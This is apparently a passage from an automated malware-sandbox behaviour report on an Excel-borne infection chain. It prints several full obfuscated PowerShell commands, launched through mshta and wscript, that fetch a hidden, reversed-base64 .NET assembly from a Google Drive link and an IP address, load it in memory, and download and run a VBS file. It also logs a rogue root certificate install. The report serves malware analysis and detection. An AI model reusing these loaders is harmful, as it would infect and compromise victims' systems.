Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )" Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mans504x\mans504x.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.cmdline" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mans504x\mans504x.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_000007FE88E500BD pushad ; iretd 5_2_000007FE88E500C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_000007FE88E5022D push eax; iretd 5_2_000007FE88E50241

Persistence and Installation Behavior

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\mans504x\mans504x.dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
